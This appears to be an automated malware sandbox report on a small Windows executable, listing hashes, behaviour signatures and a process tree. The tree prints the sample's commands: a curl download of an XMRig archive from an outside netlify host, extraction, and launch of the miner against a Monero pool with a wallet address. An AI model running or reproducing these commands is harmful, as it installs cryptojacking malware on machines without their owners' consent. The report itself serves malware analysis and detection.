Resubmissions

13/03/2024, 08:45

240313-knsznahb2w 10

13/03/2024, 08:44

240313-knhtpaah68 10

13/03/2024, 08:44

240313-km8cysha9v 10

13/03/2024, 08:43

240313-kms82aah48 10

12/03/2024, 18:00

240312-wlevsshe86 10

12/03/2024, 17:57

240312-wjxylahe48 10

12/03/2024, 17:55

240312-whm21afc7t 10

12/03/2024, 17:54

240312-wg7p1sfc5y 10

12/03/2024, 17:53

240312-wgg5csfc3y 10

12/03/2024, 17:52

240312-wf31fahd58 10

Analysis

  • max time kernel
    610s
  • max time network
    552s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/03/2024, 17:57

General

  • Target

    test - Copy - Copy - Copy.exe

  • Size

    6KB

  • MD5

    4634098fe194204dc03f967cc0b19cd6

  • SHA1

    eaa58619c6cea9f148cec61ee504cd727b3e80d8

  • SHA256

    a1070b8803e4243699a44a77e60a199282814495bc3bd94759c07021c0a6c70c

  • SHA512

    64e97fac56a25daf99f8ee1a9f480acc8020d5da4eb96ea77022c9170f6300b7b5479fce86e3e7e088cdaabdf123b65872e09b0ae17f8f97ea2fe58b6ecf7a9d

  • SSDEEP

    96:2Fb158Vgo4CVvAXklfZT8kYl9RxxgAVNb8ICcGKzNt:oMV1vAX+8kYDRxbLh4s

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\test - Copy - Copy - Copy.exe
    "C:\Users\Admin\AppData\Local\Temp\test - Copy - Copy - Copy.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3544
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tSWWOj8m.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2220
      • C:\Windows\system32\curl.exe
        curl -o "C:\xmrig\xmrig-6.21.1-gcc-win64.zip" https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip
        3⤵
          PID:692
        • C:\Windows\system32\tar.exe
          tar -xf "C:\xmrig\xmrig-6.21.1-gcc-win64.zip"
          3⤵
            PID:3620
          • C:\xmrig\xmrig-6.21.1\xmrig.exe
            C:\xmrig\xmrig-6.21.1\xmrig.exe --coin=XMR -o xmr.2miners.com:2222 -u 49QgS4Cu9uqVeqgDpwtdZWYZrDNrUJXfzDiGmwsZFLdEgQPAQV7SbswUHqZG3B45HAiSR1cYZoSvgC56kctnqsSjMNFnJmU.RIG -p x --cpu-affinity=5 --cpu-no-yield
            3⤵
            • Executes dropped EXE
            PID:2204
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
        1⤵
          PID:4404
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k UnistackSvcGroup
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2628

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\tSWWOj8m.bat

                Filesize

                421B

                MD5

                67d11b392feb0ad59fc11ff3e79dfeee

                SHA1

                7df5785988cb76c4893773614572c93baaa18717

                SHA256

                69bcf6c4c959410d5857ac219600cec68035bd92e708c0bf7318eece8d5acb9d

                SHA512

                50835d7dccb22cbf052a64ce2dd50df97f726b1d2044ab0e55ba42a2874601b6fe064f84659f89ce079627d147cf49d9548b24b2160a17783b934c6793507f11

              • C:\xmrig\xmrig-6.21.1-gcc-win64.zip

                Filesize

                1.0MB

                MD5

                4bd8a1d5b7a83b703d0c56f49bcd72b0

                SHA1

                64aa1e91036f1cda055a1c73e30e415461ff80c5

                SHA256

                a47d0e7390a91f0ca2b4391a6ee0abc0a1219d29e6e50ada0ab2d5c8db09fe39

                SHA512

                4e1a93ed04169bdc9ccbe895521f4a27a2d83f90161e59baa99093db56e254251dadf802f553eef94a9629dd055840b1ebf2685561153ab74ed6ca6640a138d3

              • C:\xmrig\xmrig-6.21.1\xmrig.exe

                Filesize

                3.6MB

                MD5

                8107c21eb92daf5e5668b9b7b1a2d8aa

                SHA1

                b9936f9ec124157980819190bbe51730ca6ae23b

                SHA256

                f3e5a1af8f09551b861951c45a3f68631bdde444bacae37a260b624cf657da9e

                SHA512

                375cb7f830c4f23216c907d1d63bfd9135118ad1460f6818c32c4eb3fe730f12e2f130f04b6f8d577f6fe1e20819a5a59c1ef4dc350be92bc9bc1670604c35c3

              • memory/2628-61-0x0000019600030000-0x0000019600031000-memory.dmp

                Filesize

                4KB

              • memory/2628-63-0x0000019600030000-0x0000019600031000-memory.dmp

                Filesize

                4KB

              • memory/2628-91-0x0000019600420000-0x0000019600421000-memory.dmp

                Filesize

                4KB

              • memory/2628-92-0x0000019600530000-0x0000019600531000-memory.dmp

                Filesize

                4KB

              • memory/2628-24-0x0000019676940000-0x0000019676950000-memory.dmp

                Filesize

                64KB

              • memory/2628-40-0x0000019676A40000-0x0000019676A50000-memory.dmp

                Filesize

                64KB

              • memory/2628-56-0x0000019600010000-0x0000019600011000-memory.dmp

                Filesize

                4KB

              • memory/2628-57-0x0000019600030000-0x0000019600031000-memory.dmp

                Filesize

                4KB

              • memory/2628-58-0x0000019600030000-0x0000019600031000-memory.dmp

                Filesize

                4KB

              • memory/2628-59-0x0000019600030000-0x0000019600031000-memory.dmp

                Filesize

                4KB

              • memory/2628-60-0x0000019600030000-0x0000019600031000-memory.dmp

                Filesize

                4KB

              • memory/2628-90-0x0000019600420000-0x0000019600421000-memory.dmp

                Filesize

                4KB

              • memory/2628-62-0x0000019600030000-0x0000019600031000-memory.dmp

                Filesize

                4KB

              • memory/2628-88-0x0000019600410000-0x0000019600411000-memory.dmp

                Filesize

                4KB

              • memory/2628-64-0x0000019600030000-0x0000019600031000-memory.dmp

                Filesize

                4KB

              • memory/2628-65-0x0000019600030000-0x0000019600031000-memory.dmp

                Filesize

                4KB

              • memory/2628-66-0x0000019600030000-0x0000019600031000-memory.dmp

                Filesize

                4KB

              • memory/2628-67-0x00000196000F0000-0x00000196000F1000-memory.dmp

                Filesize

                4KB

              • memory/2628-68-0x00000196000E0000-0x00000196000E1000-memory.dmp

                Filesize

                4KB

              • memory/2628-70-0x00000196000F0000-0x00000196000F1000-memory.dmp

                Filesize

                4KB

              • memory/2628-73-0x00000196000E0000-0x00000196000E1000-memory.dmp

                Filesize

                4KB

              • memory/2628-76-0x000001967EB90000-0x000001967EB91000-memory.dmp

                Filesize

                4KB

              • memory/3544-7-0x00007FFBBF280000-0x00007FFBBFD41000-memory.dmp

                Filesize

                10.8MB

              • memory/3544-0-0x0000000000980000-0x0000000000988000-memory.dmp

                Filesize

                32KB

              • memory/3544-23-0x00007FFBBF280000-0x00007FFBBFD41000-memory.dmp

                Filesize

                10.8MB

              • memory/3544-5-0x00007FFBBF280000-0x00007FFBBFD41000-memory.dmp

                Filesize

                10.8MB